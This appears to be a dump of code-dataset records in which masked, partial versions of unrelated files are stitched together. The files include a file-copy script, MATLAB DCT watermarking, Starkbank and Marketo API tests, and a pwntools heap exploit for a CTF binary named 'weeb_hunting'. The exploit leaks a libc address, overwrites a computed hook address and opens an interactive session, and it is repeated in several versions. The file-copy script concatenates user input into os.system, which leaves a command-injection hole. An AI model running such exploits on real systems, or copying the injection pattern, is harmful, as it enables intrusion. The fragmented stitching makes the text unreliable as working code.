ext = raw_input("provide extention type to be copied eg .tif or .jpg :")
os.system('dir ' + org_GIS + '*' + ext + ' /s/d/b >' + org_GIS + 'tempext.txt')
file1 = open(org_GIS + 'tempext.txt', 'r')
lines = file1.readlines()
for line in lines:
ln = line.rstrip('\n')
shutil.copy(ln, outputfolder)
file1.close()
os.system('del ' + org_GIS + 'tempext.txt')
raw_input("done!")
| [
0,
1,
2,
3,
4
] |
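An equivalent, portable sketch of what the script above does with `dir /s/b` and a temp file — walking the tree and copying every file with the requested extension into one flat folder — without shelling out (Python 3; the paths in the commented call are examples only):

import os
import shutil

def copy_by_extension(src_root, dst_folder, ext):
    # Walk the whole tree and copy matching files flat into dst_folder
    for dirpath, _dirnames, filenames in os.walk(src_root):
        for name in filenames:
            if name.lower().endswith(ext.lower()):
                shutil.copy(os.path.join(dirpath, name), dst_folder)

# copy_by_extension(r'C:\Dropbox\Barcin_Hoyuk\AIS\GIS', r'C:\Temp', '.tif')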
635 | 56d3e59e3e077b1febb834668aba44ce8dba13ae | clear ;
clc;
%-----------------------读入图像-------------------------------------%
markbefore=imread('p203.bmp');
markbefore2=rgb2gray(markbefore);
mark=im2bw(markbefore2);
figure(1);
subplot(2,3,1);
imshow(mark),title('Watermark image');
[rm,cm]=size(mark);
cover=imread('pic.bmp');
cover1=imresize(cover,[512,512]);
cover_image=rgb2gray(cover1);
subplot(2,3,2),imshow(cover_image,[]),title('Original image');
before=blkproc(cover_image,[8 8],'dct2'); % Split the cover image's gray layer into 8x8 blocks and apply a 2-D DCT to each; the results go into matrix before
I=mark;
alpha=50; % Scale factor: controls the embedding strength, i.e. how much the frequency-domain coefficients are modified
k1=randn(1,8); % Generate two different random sequences
k2=randn(1,8);
after=before; % Initialize the result matrix for the watermarked image
for i=1:rm % Embed the watermark in the mid-frequency band
for j=1:cm
x=(i-1)*8;
y=(j-1)*8;
if mark(i,j)==1
k=k1;
else
k=k2;
end;
after(x+1,y+8)=before(x+1,y+8)+alpha*k(1);
after(x+2,y+7)=before(x+2,y+7)+alpha*k(2);
after(x+3,y+6)=before(x+3,y+6)+alpha*k(3);
after(x+4,y+5)=before(x+4,y+5)+alpha*k(4);
after(x+5,y+4)=before(x+5,y+4)+alpha*k(5);
after(x+6,y+3)=before(x+6,y+3)+alpha*k(6);
after(x+7,y+2)=before(x+7,y+2)+alpha*k(7);
after(x+8,y+1)=before(x+8,y+1)+alpha*k(8);
end;
end;
result=blkproc(after,[8 8],'idct2'); % Split the processed image into 8x8 blocks and apply the inverse 2-D DCT to each
result = uint8(result);
imwrite(result,'watermarked.bmp','bmp'); % Save the watermarked image as watermarked.bmp
subplot(2,3,3),imshow(result,[]),title('Watermarked image');
subplot(2,3,4);
imshow(result,[]);
title('Watermark image');
withmark=result;
subplot(2,3,4);
imshow(result,[]);
title('Image');
withmark=result;
%------------------------Watermark extraction-----------------------------%
%
after_2=blkproc(withmark,[8,8],'dct2'); % Start extraction: split the gray layer into blocks and apply the DCT
p=zeros(1,8); % Initialize the matrix used to hold the extracted values
mark_2 = zeros(rm,cm);
for i=1:rm
for j=1:cm
x=(i-1)*8;y=(j-1)*8;
p(1)=after_2(x+1,y+8); % Pull out the values at the positions that were modified earlier
p(2)=after_2(x+2,y+7);
p(3)=after_2(x+3,y+6);
p(4)=after_2(x+4,y+5);
p(5)=after_2(x+5,y+4);
p(6)=after_2(x+6,y+3);
p(7)=after_2(x+7,y+2);
p(8)=after_2(x+8,y+1);
if corr2(p,k1)>corr2(p,k2) % corr2 measures the similarity of two matrices; closer to 1 means more similar
mark_2(i,j)=1; % Compare the extracted values with sequences k1 and k2 to recover the watermark pattern
else
mark_2(i,j)=0;
end
end
end
subplot(2,3,5);
mark_2 = uint8(mark_2);
imshow(mark_2,[]),title('Extracted watermark');
subplot(2,3,6);
imshow(mark),title('Original watermark');
| null | null | null | null | [
0
] |
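The detection rule in the MATLAB record reduces to a correlation test per 8x8 block: the modified mid-band coefficients correlate far more strongly with whichever key sequence was embedded. A small NumPy sketch of just that rule (all values synthetic):

import numpy as np

rng = np.random.default_rng(0)
k1, k2 = rng.standard_normal(8), rng.standard_normal(8)
alpha = 50.0

original = rng.standard_normal(8)  # stand-in for one block's mid-band coefficients
embedded = original + alpha * k1   # bit "1" embedded with key k1

def corr(a, b):
    # same idea as MATLAB's corr2, for 1-D vectors
    return np.corrcoef(a, b)[0, 1]

bit = 1 if corr(embedded, k1) > corr(embedded, k2) else 0
print('decoded bit:', bit)  # 1, since the k1 correlation dominates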
636 | 5eb4c71869b077dac0d61072c99d801030395fc2 | <mask token>
| <mask token>
pwnlib.gdb.attach(p)
<mask token>
while 'You found a' not in r:
r = p.recvuntil('>')
p.send('AAAA\n')
p.send('AAAA\n')
<mask token>
while 'You found a' not in r:
r = p.recvuntil('>')
p.send('AAAA\n')
p.send('AAAA\n')
<mask token>
while 'You found a' not in r:
r = p.recvuntil('>')
p.send('AAAA\n')
p.send('\n')
<mask token>
while 'You found a' not in r:
r = p.recvuntil('>')
p.send('\n')
p.send('\n')
<mask token>
while '10. empty' not in r:
p.send('\n')
r = p.recv()
p.sendline('1')
<mask token>
while '10. empty' not in r:
p.send('\n')
r = p.recv()
p.sendline('4')
<mask token>
while 'You found a' not in r:
p.send('\n')
r = p.recv()
p.sendline('A"`')
<mask token>
while 'You found a' not in r:
p.send('\n')
r = p.recv()
p.sendline('AAAA')
<mask token>
while 'You found a' not in r:
p.send('\n')
r = p.recv()
p.sendline('AAAA')
<mask token>
while 'You found a sword' not in r:
p.send('\n')
r = p.recv()
p.sendline('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA` `')
<mask token>
while '10. empty' not in r:
p.send('\n')
r = p.recv()
<mask token>
log.info(hex(__srandom))
<mask token>
log.info('Fake chunk: ' + hex(hook))
p.sendline('2')
<mask token>
while '10. empty' not in r:
p.send('\n')
r = p.recv()
p.sendline('3')
<mask token>
while '10. empty' not in r:
p.send('\n')
r = p.recv()
p.sendline('4')
<mask token>
while '10. empty' not in r:
p.send('\n')
r = p.recv()
p.sendline('3')
<mask token>
while 'You found a' not in r:
p.send('\n')
r = p.recv()
p.sendline(p64(hook)[:6])
p.interactive()
| <mask token>
p = process('./weeb_hunting')
elf = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
pwnlib.gdb.attach(p)
r = p.recv()
while 'You found a' not in r:
r = p.recvuntil('>')
p.send('AAAA\n')
p.send('AAAA\n')
r = p.recv()
while 'You found a' not in r:
r = p.recvuntil('>')
p.send('AAAA\n')
p.send('AAAA\n')
r = p.recv()
while 'You found a' not in r:
r = p.recvuntil('>')
p.send('AAAA\n')
p.send('\n')
r = p.recv()
while 'You found a' not in r:
r = p.recvuntil('>')
p.send('\n')
p.send('\n')
r = p.recv()
while '10. empty' not in r:
p.send('\n')
r = p.recv()
p.sendline('1')
r = p.recv()
while '10. empty' not in r:
p.send('\n')
r = p.recv()
p.sendline('4')
r = p.recv()
while 'You found a' not in r:
p.send('\n')
r = p.recv()
p.sendline('A"`')
r = p.recv()
while 'You found a' not in r:
p.send('\n')
r = p.recv()
p.sendline('AAAA')
r = p.recv()
while 'You found a' not in r:
p.send('\n')
r = p.recv()
p.sendline('AAAA')
r = p.recv()
while 'You found a sword' not in r:
p.send('\n')
r = p.recv()
p.sendline('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA` `')
r = p.recv()
while '10. empty' not in r:
p.send('\n')
r = p.recv()
__srandom = u64((r.split('1. ')[1].split('\n')[0] + '\x00' * 8)[:8])
log.info(hex(__srandom))
hook = __srandom + 3711517
log.info('Fake chunk: ' + hex(hook))
p.sendline('2')
r = p.recv()
while '10. empty' not in r:
p.send('\n')
r = p.recv()
p.sendline('3')
r = p.recv()
while '10. empty' not in r:
p.send('\n')
r = p.recv()
p.sendline('4')
r = p.recv()
while '10. empty' not in r:
p.send('\n')
r = p.recv()
p.sendline('3')
r = p.recv()
while 'You found a' not in r:
p.send('\n')
r = p.recv()
p.sendline(p64(hook)[:6])
p.interactive()
| from pwn import *
p = process('./weeb_hunting')
elf = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
pwnlib.gdb.attach(p)
r = p.recv()
while 'You found a' not in r:
r = p.recvuntil('>')
p.send('AAAA\n')
p.send('AAAA\n')
r = p.recv()
while 'You found a' not in r:
r = p.recvuntil('>')
p.send('AAAA\n')
p.send('AAAA\n')
r = p.recv()
while 'You found a' not in r:
r = p.recvuntil('>')
p.send('AAAA\n')
p.send('\n')
r = p.recv()
while 'You found a' not in r:
r = p.recvuntil('>')
p.send('\n')
p.send('\n')
r = p.recv()
while '10. empty' not in r:
p.send('\n')
r = p.recv()
p.sendline('1')
r = p.recv()
while '10. empty' not in r:
p.send('\n')
r = p.recv()
p.sendline('4')
r = p.recv()
while 'You found a' not in r:
p.send('\n')
r = p.recv()
p.sendline('A"`')
r = p.recv()
while 'You found a' not in r:
p.send('\n')
r = p.recv()
p.sendline('AAAA')
r = p.recv()
while 'You found a' not in r:
p.send('\n')
r = p.recv()
p.sendline('AAAA')
r = p.recv()
while 'You found a sword' not in r:
p.send('\n')
r = p.recv()
p.sendline('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA` `')
r = p.recv()
while '10. empty' not in r:
p.send('\n')
r = p.recv()
__srandom = u64((r.split('1. ')[1].split('\n')[0] + '\x00' * 8)[:8])
log.info(hex(__srandom))
hook = __srandom + 3711517
log.info('Fake chunk: ' + hex(hook))
p.sendline('2')
r = p.recv()
while '10. empty' not in r:
p.send('\n')
r = p.recv()
p.sendline('3')
r = p.recv()
while '10. empty' not in r:
p.send('\n')
r = p.recv()
p.sendline('4')
r = p.recv()
while '10. empty' not in r:
p.send('\n')
r = p.recv()
p.sendline('3')
r = p.recv()
while 'You found a' not in r:
p.send('\n')
r = p.recv()
p.sendline(p64(hook)[:6])
p.interactive()
| from pwn import *
p = process("./weeb_hunting")
elf = ELF("/lib/x86_64-linux-gnu/libc-2.23.so")
pwnlib.gdb.attach(p)
r = p.recv()
while "You found a" not in r:
r = p.recvuntil(">")
p.send("AAAA\n")
p.send("AAAA\n")
r = p.recv()
while "You found a" not in r:
r = p.recvuntil(">")
p.send("AAAA\n")
p.send("AAAA\n")
r = p.recv()
while "You found a" not in r:
r = p.recvuntil(">")
p.send("AAAA\n")
p.send("\n")
r = p.recv()
while "You found a" not in r:
r = p.recvuntil(">")
p.send("\n")
p.send("\n")
r = p.recv()
while "10. empty" not in r:
p.send("\n")
r = p.recv()
p.sendline("1")
r = p.recv()
while "10. empty" not in r:
p.send("\n")
r = p.recv()
p.sendline("4")
r = p.recv()
while "You found a" not in r:
p.send("\n")
r = p.recv()
p.sendline('\x41\x22\x60')
r = p.recv()
while "You found a" not in r:
p.send("\n")
r = p.recv()
p.sendline('AAAA')
r = p.recv()
while "You found a" not in r:
p.send("\n")
r = p.recv()
p.sendline('AAAA')
r = p.recv()
while "You found a sword" not in r:
p.send("\n")
r = p.recv()
p.sendline("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA` `")
r = p.recv()
while "10. empty" not in r:
p.send("\n")
r = p.recv()
__srandom = u64((r.split("1. ")[1].split("\n")[0] + "\x00"*8)[:8])
log.info(hex(__srandom))
hook = __srandom + 0x38A21D
log.info("Fake chunk: " + hex(hook))
p.sendline("2")
r = p.recv()
while "10. empty" not in r:
p.send("\n")
r = p.recv()
p.sendline("3")
r = p.recv()
while "10. empty" not in r:
p.send("\n")
r = p.recv()
p.sendline("4")
r = p.recv()
while "10. empty" not in r:
p.send("\n")
r = p.recv()
p.sendline("3")
r = p.recv()
while "You found a" not in r:
p.send("\n")
r = p.recv()
p.sendline(p64(hook)[:6])
p.interactive()
| [
0,
1,
2,
3,
4
] |
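The hardcoded delta 0x38A21D (3711517) above ties the exploit to one libc build. A less brittle sketch derives the distance from the libc's own symbol table with pwntools; the symbol pairing below is an assumption for illustration, not taken from the challenge binary:

from pwn import ELF

libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
# hypothetical pairing: leak of srandom, overwrite target __malloc_hook
delta = libc.symbols['__malloc_hook'] - libc.symbols['srandom']
print(hex(delta))  # then: hook = leak + delta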
637 | 383d3b35fbfb7921111b28c3160173ce1c200387 | <mask token>
| <mask token>
def generateExampleBoletoPaymentsJson(n=1, next_day=False):
boletos = generateExampleBoletosJson(n=n)
boletos = starkbank.boleto.create(boletos)
payments = []
for boleto in boletos:
payment = deepcopy(example_payment)
payment.line = boleto.line
payment.scheduled = min(date.today() + timedelta(days=1) if
next_day else date.today(), (boleto.due - timedelta(hours=3)).
date())
payment.description = sha256(str(boleto.id).encode('utf-8')).hexdigest(
)
payments.append(payment)
return payments
| <mask token>
example_payment = BoletoPayment(line=
'34191.09008 61713.957308 71444.640008 2 83430000984732', scheduled=
'2020-02-29', description='loading a random account', tax_id=
'20.018.183/0001-80')
def generateExampleBoletoPaymentsJson(n=1, next_day=False):
boletos = generateExampleBoletosJson(n=n)
boletos = starkbank.boleto.create(boletos)
payments = []
for boleto in boletos:
payment = deepcopy(example_payment)
payment.line = boleto.line
payment.scheduled = min(date.today() + timedelta(days=1) if
next_day else date.today(), (boleto.due - timedelta(hours=3)).
date())
payment.description = sha256(str(boleto.id).encode('utf-8')).hexdigest(
)
payments.append(payment)
return payments
| from copy import deepcopy
from datetime import date, timedelta
from hashlib import sha256
import starkbank
from starkbank import BoletoPayment
from .boleto import generateExampleBoletosJson
example_payment = BoletoPayment(line=
'34191.09008 61713.957308 71444.640008 2 83430000984732', scheduled=
'2020-02-29', description='loading a random account', tax_id=
'20.018.183/0001-80')
def generateExampleBoletoPaymentsJson(n=1, next_day=False):
boletos = generateExampleBoletosJson(n=n)
boletos = starkbank.boleto.create(boletos)
payments = []
for boleto in boletos:
payment = deepcopy(example_payment)
payment.line = boleto.line
payment.scheduled = min(date.today() + timedelta(days=1) if
next_day else date.today(), (boleto.due - timedelta(hours=3)).
date())
payment.description = sha256(str(boleto.id).encode('utf-8')).hexdigest(
)
payments.append(payment)
return payments
| from copy import deepcopy
from datetime import date, timedelta
from hashlib import sha256
import starkbank
from starkbank import BoletoPayment
from .boleto import generateExampleBoletosJson
example_payment = BoletoPayment(
line="34191.09008 61713.957308 71444.640008 2 83430000984732",
scheduled="2020-02-29",
description="loading a random account",
tax_id="20.018.183/0001-80",
)
def generateExampleBoletoPaymentsJson(n=1, next_day=False):
boletos = generateExampleBoletosJson(n=n)
boletos = starkbank.boleto.create(boletos)
payments = []
for boleto in boletos:
payment = deepcopy(example_payment)
payment.line = boleto.line
payment.scheduled = min((date.today() + timedelta(days=1)) if next_day else date.today(), (boleto.due - timedelta(hours=3)).date())
payment.description = sha256(str(boleto.id).encode('utf-8')).hexdigest()
payments.append(payment)
return payments
| [
0,
1,
2,
3,
4
] |
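A quick standalone illustration (dates chosen arbitrarily) of the scheduling rule above: pay on the requested day, but never after the boleto's due date once its UTC timestamp is shifted to BRT (UTC-3):

from datetime import date, datetime, timedelta

due = datetime(2020, 3, 1, 1, 0)              # a due timestamp stored in UTC
requested = date.today() + timedelta(days=1)  # the next_day=True case
scheduled = min(requested, (due - timedelta(hours=3)).date())
print(scheduled)  # capped at 2020-02-29, the due date in UTC-3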
638 | b05a5fcbba74bf4108bc953c6f868eb1f5ca298f | from pymarketo.client import MarketoClientFactory
import os
import sys #@UnusedImport
import time #@UnusedImport
import datetime #@UnusedImport
from pprint import pprint #@UnresolvedImport
TESTDIR = os.path.split(__file__)[0]
PACKAGEDIR = os.path.join(TESTDIR,"..")
INIFILE = os.path.join(PACKAGEDIR,"marketo.ini")
DATAFILES=["specification","listMObjects"]
# The following must be set up on your marketo account to enable tests
LEADEMAIL = "[email protected]" # Email of an internal contact
LEADLIST = "2wr-0" # List name containing LEADEMAIL contact
SPECIALCODE = "WebReplyJobCode" # If your leads have a custom field that can be
SPECIALVALUE= "WEBREPLY" # asserted for LEADEMAIL, set them here
TESTCAMPAIGN = "SOAP API Access test" # Name of test campaign that has SOAP API trigger enabled
DELETECAMPAIGN = "Delete lead" # Campaign configure to delete leads added to the campaign
# First and last names, and synthetic email addresses for new leads
# These will be added and then deleted
TESTDOMAIN="webreply.com"
TESTNAMES = [("One","Test",TESTDOMAIN),("Two","Test",TESTDOMAIN)]
TESTEMAILS = ["%s.%s@%s" % name for name in TESTNAMES]
mc = MarketoClientFactory(INIFILE)
def compareData(datafile, data):
path = os.path.join(TESTDIR,datafile+".txt")
return open(path).read().strip() == data.strip()
def test_data():
"Make sure that all the test data files are present"
assert os.path.exists(INIFILE)
for datafile in DATAFILES:
assert os.path.exists(os.path.join(TESTDIR,datafile+".txt"))
# Factory methods to build structures for arguments
def aStringArray(strings):
asa = mc.factory.create("ArrayOfString")
asa.stringItem = strings
return asa
def aLeadKey(email=None,id=None):
leadkey = mc.factory.create("LeadKey")
if email:
leadkey.keyType = "EMAIL"
leadkey.keyValue = email
elif id:
leadkey.keyType = "IDNUM"
leadkey.keyValue = id
return leadkey
def aLeadKeyArray(leads):
lka = mc.factory.create("ArrayOfLeadKey")
lka.leadKey = leads
return lka
def aListKey(lk, keyType = "MKTOLISTNAME"):
listkey = mc.factory.create("ListKey")
listkey.keyType = keyType
listkey.keyValue = lk
return listkey
def anAttrib(**kwargs):
attrib = mc.factory.create("Attrib")
for key, value in kwargs.items():
setattr(attrib, key, value)
return attrib
def anAttribArray(attribs):
aa = mc.factory.create("ArrayOfAttrib")
aa.attrib=attribs
return aa
def anAttribute(**kwargs):
attrib = mc.factory.create("Attribute")
for key, value in kwargs.items():
setattr(attrib, key, value)
return attrib
def anAttributeArray(attributes):
aa = mc.factory.create("ArrayOfAttribute")
aa.attribute=attributes
return aa
def aLeadRecord(id=None, email=None, foreignsyspersonid=None,foreignsystype=None,attributes=None):
lr = mc.factory.create("LeadRecord")
if id:
lr.Id = id
elif email:
lr.Email = email
elif foreignsyspersonid:
assert foreignsystype
lr.ForeignSysPersonId = foreignsyspersonid
lr.ForeignSysType = foreignsystype
if attributes:
lr.leadAttributeList = attributes
return lr
def aLeadRecordArray(leadrecords):
lra = mc.factory.create("ArrayOfLeadRecord")
lra.leadRecord = leadrecords
return lra
# Several things come back with an attribute list that is more pleasant as a dictionary
def attrs2dict(attributelist):
if attributelist is None:
return {}
attributelist = attributelist[0]
d = dict([(attr.attrName,attr.attrValue) for attr in attributelist])
return d
def dict2attrs(d):
al = []
for key, value in d.items():
al.append(anAttribute(attrName=key,attrValue=value))
return anAttributeArray(al)
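# Round-trip note (illustrative, not part of the original tests): attrs2dict
# expects the suds-style [[Attribute, ...]] nesting, so converting back from
# dict2attrs needs the inner list wrapped once more, e.g.
#   d = {"FirstName": "One", "LastName": "Test"}
#   assert attrs2dict([dict2attrs(d).attribute]) == d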
def test_specification():
compareData("specification", str(mc))
# As of 1.7, these are the methods
# Untested: deleteCustomObjects(xs:string objTypeName, ArrayOfKeyList customObjKeyLists, )
# UnTested: deleteMObjects(ArrayOfMObject mObjectList, )
# Tested: describeMObject(xs:string objectName, )
# Requires having a trigger set for the campaign, from Marketo support:
# Your SOAP request is fine. In order for the getCampaignsForSource call to work,
# you must have a "Campaign is Requested" trigger in the your campaign set to Web Service API.
# Tested: getCampaignsForSource(ReqCampSourceType source, xs:string name, xs:boolean exactName, )
# Untested: getCustomObjects(xs:string objTypeName, xs:string streamPosition, xs:int batchSize, ArrayOfAttribute customObjKeyList, ArrayOfString includeAttributes, )
# Tested: getLead(LeadKey leadKey, )
# Tested: getLeadActivity(LeadKey leadKey, ActivityTypeFilter activityFilter, StreamPosition startPosition, xs:int batchSize, )
# Tested: getLeadChanges(StreamPosition startPosition, ActivityTypeFilter activityFilter, xs:int batchSize, )
# getMObjects(xs:string type, xs:int id, Attrib externalKey, ArrayOfMObjCriteria mObjCriteriaList, ArrayOfMObjAssociation mObjAssociationList, xs:string streamPosition, )
# Tested: getMultipleLeads(xs:dateTime lastUpdatedAt, xs:string streamPosition, xs:int batchSize, ArrayOfString includeAttributes, )
# Tested: listMObjects()
# Tested: listOperation(ListOperationType listOperation, ListKey listKey, ArrayOfLeadKey listMemberList, xs:boolean strict, )
# mergeLeads(ArrayOfAttribute winningLeadKeyList, ArrayOfKeyList losingLeadKeyLists, )
# requestCampaign(ReqCampSourceType source, xs:int campaignId, ArrayOfLeadKey leadList, )
# syncCustomObjects(xs:string objTypeName, ArrayOfCustomObj customObjList, SyncOperationEnum operation, )
# Tested: syncLead(LeadRecord leadRecord, xs:boolean returnLead, xs:string marketoCookie, )
# Untested: syncMObjects(ArrayOfMObject mObjectList, SyncOperationEnum operation, )
# Tested: syncMultipleLeads(ArrayOfLeadRecord leadRecordList, xs:boolean dedupEnabled, )
# Campaign sources
# <xs:enumeration value="MKTOWS"/>
# <xs:enumeration value="SALES"/>
def test_getCampaignsForSource():
print "Testing getCampaignsForSource"
campaigns = mc.service.getCampaignsForSource("MKTOWS",None,False)
resultCount = campaigns.returnCount
campaignrecords = campaigns.campaignRecordList[0]
assert resultCount==len(campaignrecords), "Result count '%s' does not match campaign list '%s'" % (resultCount, len(campaigns))
for campaign in campaignrecords:
print campaign.id, campaign.name, campaign.description
print
def test_getLead():
print "Testing getLead"
leadkey = aLeadKey(email=LEADEMAIL)
lead = mc.service.getLead(leadkey)
assert lead.count == 1
lead = lead.leadRecordList.leadRecord[0]
attrs = attrs2dict(lead.leadAttributeList)
print lead.Id, lead.Email
pprint(attrs)
if SPECIALCODE and SPECIALVALUE:
assert attrs[SPECIALCODE] == SPECIALVALUE
print
# As of 1.7, these are the activity types
# <xs:enumeration value="VisitWebpage"/>
# <xs:enumeration value="FillOutForm"/>
# <xs:enumeration value="ClickLink"/>
# <xs:enumeration value="RegisterForEvent"/>
# <xs:enumeration value="AttendEvent"/>
# <xs:enumeration value="SendEmail"/>
# <xs:enumeration value="EmailDelivered"/>
# <xs:enumeration value="EmailBounced"/>
# <xs:enumeration value="UnsubscribeEmail"/>
# <xs:enumeration value="OpenEmail"/>
# <xs:enumeration value="ClickEmail"/>
# <xs:enumeration value="NewLead"/>
# <xs:enumeration value="ChangeDataValue"/>
# <xs:enumeration value="LeadAssigned"/>
# <xs:enumeration value="NewSFDCOpprtnty"/>
# <xs:enumeration value="Wait"/>
# <xs:enumeration value="RunSubflow"/>
# <xs:enumeration value="RemoveFromFlow"/>
# <xs:enumeration value="PushLeadToSales"/>
# <xs:enumeration value="CreateTask"/>
# <xs:enumeration value="ConvertLead"/>
# <xs:enumeration value="ChangeScore"/>
# <xs:enumeration value="ChangeOwner"/>
# <xs:enumeration value="AddToList"/>
# <xs:enumeration value="RemoveFromList"/>
# <xs:enumeration value="SFDCActivity"/>
# <xs:enumeration value="EmailBouncedSoft"/>
# <xs:enumeration value="PushLeadUpdatesToSales"/>
# <xs:enumeration value="DeleteLeadFromSales"/>
# <xs:enumeration value="SFDCActivityUpdated"/>
# <xs:enumeration value="SFDCMergeLeads"/>
# <xs:enumeration value="MergeLeads"/>
# <xs:enumeration value="ResolveConflicts"/>
# <xs:enumeration value="AssocWithOpprtntyInSales"/>
# <xs:enumeration value="DissocFromOpprtntyInSales"/>
# <xs:enumeration value="UpdateOpprtntyInSales"/>
# <xs:enumeration value="DeleteLead"/>
# <xs:enumeration value="SendAlert"/>
# <xs:enumeration value="SendSalesEmail"/>
# <xs:enumeration value="OpenSalesEmail"/>
# <xs:enumeration value="ClickSalesEmail"/>
# <xs:enumeration value="AddtoSFDCCampaign"/>
# <xs:enumeration value="RemoveFromSFDCCampaign"/>
# <xs:enumeration value="ChangeStatusInSFDCCampaign"/>
# <xs:enumeration value="ReceiveSalesEmail"/>
# <xs:enumeration value="InterestingMoment"/>
# <xs:enumeration value="RequestCampaign"/>
# <xs:enumeration value="SalesEmailBounced"/>
# <xs:enumeration value="ChangeLeadPartition"/>
# <xs:enumeration value="ChangeRevenueStage"/>
# <xs:enumeration value="ChangeRevenueStageManually"/>
# <xs:enumeration value="ComputeDataValue"/>
# <xs:enumeration value="ChangeStatusInProgression"/>
# <xs:enumeration value="ChangeFieldInProgram"/>
# <xs:enumeration value="EnrichWithJigsaw"/>
def test_getLeadActivity():
print "Testing getLeadActivity"
leadkey = aLeadKey(email=LEADEMAIL)
activities = mc.service.getLeadActivity(leadkey,"")
assert activities.returnCount > 0
activityrecords = activities.activityRecordList[0]
assert len(activityrecords) == activities.returnCount
for activity in activityrecords:
print "Activity", activity.activityDateTime,activity.activityType
attrs = attrs2dict(activity.activityAttributes)
pprint(attrs)
print
def test_requestCampaign():
print "Testing requestCampaign"
campaigns = mc.service.getCampaignsForSource("MKTOWS",None,False)
campaignrecords = campaigns.campaignRecordList[0]
campaignid = None
for campaign in campaignrecords:
if campaign.name == TESTCAMPAIGN:
print "Found", campaign.id, campaign.name, campaign.description
campaignid = campaign.id
break
assert campaignid != None
leadkey = aLeadKey(email=LEADEMAIL)
lead = mc.service.getLead(leadkey)
assert lead.count == 1
lead = lead.leadRecordList.leadRecord[0]
leadid = lead.Id
    # The lead key appears to want the numeric ID
leadkey = aLeadKey(id=leadid)
lka = aLeadKeyArray([leadkey])
result = mc.service.requestCampaign("MKTOWS", campaignid, lka)
assert result.success
print
def test_deleteLeads():
    # Depends on a campaign that deletes leads as they are added
# We also need to know the IDNUM for the contacts
lka = []
for email in TESTEMAILS:
leadkey = aLeadKey(email=email)
lead = mc.service.getLead(leadkey)
assert lead.count == 1
lead = lead.leadRecordList.leadRecord[0]
lka.append(aLeadKey(id=lead.Id))
print "Found lead", lead.Id, lead.Email
lka = aLeadKeyArray(lka)
campaigns = mc.service.getCampaignsForSource("MKTOWS",None,False)
campaignrecords = campaigns.campaignRecordList[0]
campaignid = None
for campaign in campaignrecords:
if campaign.name == DELETECAMPAIGN:
print "Found campaign", campaign.id, campaign.name, campaign.description
campaignid = campaign.id
break
assert campaignid != None
result = mc.service.requestCampaign("MKTOWS", campaignid, lka)
print result
def test_getLeadChanges():
print "Testing getLeadChanges"
since = datetime.datetime(year=2010,month=1, day=1)
changes = mc.service.getLeadChanges("",since,10)
assert changes.returnCount == 10
changerecords = changes.leadChangeRecordList[0]
assert len(changerecords) == changes.returnCount
for change in changerecords:
print "leadChange", change.activityDateTime,change.activityType
pprint(attrs2dict(change.activityAttributes))
print
def test_getMultipleLeads():
print "Testing getMultipleLeads"
lastUpdatedAt = datetime.datetime(year=2010,month=1, day=1)
leads = mc.service.getMultipleLeads(lastUpdatedAt,None,10)
assert leads.returnCount == 10
leadrecords = leads.leadRecordList[0]
assert len(leadrecords) == 10
for lead in leadrecords:
attrs = attrs2dict(lead.leadAttributeList)
print "Lead", lead.Id, lead.Email
pprint(attrs)
print
def test_getMultipleLeadsUnsubscribedFlag():
print "Testing getMultipleLeadsUnsubscribedFlag"
lastUpdatedAt = datetime.datetime(year=2010,month=1, day=1)
attributelist = aStringArray(["Suppressed"])
leads = mc.service.getMultipleLeads(lastUpdatedAt,None,10, attributelist)
assert leads.returnCount == 10
leadrecords = leads.leadRecordList[0]
assert len(leadrecords) == 10
for lead in leadrecords:
attrs = attrs2dict(lead.leadAttributeList)
print "Lead", lead.Id, lead.Email
pprint(attrs)
print
# Valid list operations as of 1.7
# <xs:enumeration value="ADDTOLIST"/>
# <xs:enumeration value="ISMEMBEROFLIST"/>
# <xs:enumeration value="REMOVEFROMLIST"/>
# Valid list types
# <xs:enumeration value="MKTOLISTNAME"/>
# <xs:enumeration value="MKTOSALESUSERID"/>
# <xs:enumeration value="SFDCLEADOWNERID"/>
def test_listOperation():
print "Testing listOperation"
# Require numeric id fields
leadkey = aLeadKey(id=1256) # Is member
leadkey2 = aLeadKey(id=1) # Is not member
result = mc.service.listOperation("ISMEMBEROFLIST",aListKey(LEADLIST),
aLeadKeyArray([leadkey,leadkey2]),True)
print "listOperation", result
def test_syncLead():
print "Testing syncLead"
    # This test creates the lead the first time only.
# The name and email are used in the "standard" marketo API examples
attrs = dict(FirstName="Sam",LastName="Haggy")
leadrecord = aLeadRecord(email="[email protected]",attributes=dict2attrs(attrs))
result = mc.service.syncLead(leadrecord, True, None)
print result.leadId, result.syncStatus.status
def test_syncMultipleLeads():
print "Testing syncMultipleLeads"
leadrecords = []
for email, (firstname,lastname,domain) in zip(TESTEMAILS, TESTNAMES):
leadrecord = aLeadRecord(email=email.lower(), attributes=dict2attrs(dict(FirstName=firstname,LastName=lastname)))
leadrecords.append(leadrecord)
lra = aLeadRecordArray(leadrecords)
print lra
result = mc.service.syncMultipleLeads(lra)
print result
print
def test_listMObjects():
print "Testing listMObjects"
mobjects = mc.service.listMObjects()
compareData("listMObjects", str(mobjects))
print
def test_describeMObject():
print "Testing describeMObject"
mobjects = ["ActivityRecord","LeadRecord","Opportunity","OpportunityPersonRole",]
descriptions = []
for mobject in mobjects:
descriptions.append(str(mc.service.describeMObject(mobject)))
descriptions = "\n".join(descriptions)
compareData("describeMObjects", descriptions)
print
if __name__ == "__main__":
test_data()
test_specification()
test_getLead()
test_getCampaignsForSource()
test_requestCampaign()
test_getLeadActivity()
test_getLeadChanges()
test_listMObjects()
test_describeMObject()
test_getLeadActivity()
test_getMultipleLeads()
test_getMultipleLeadsUnsubscribedFlag()
test_listOperation()
test_syncLead()
test_syncMultipleLeads()
test_deleteLeads()
print "All is well"
| null | null | null | null | [
0
] |
639 | e2c69191d81724cac44bebba3111a773e408b7c8 | <mask token>
| <mask token>
while i <= lowerlimit:
print(i, '*', tablenumber, '=', i * tablenumber)
i = i + 1
print('=======================================================')
<mask token>
for foreachnumber in range(upperlimit, lowerlimit + 1):
    print(foreachnumber, '*', tablenumber, '=', foreachnumber * tablenumber)
print('=======================================================')
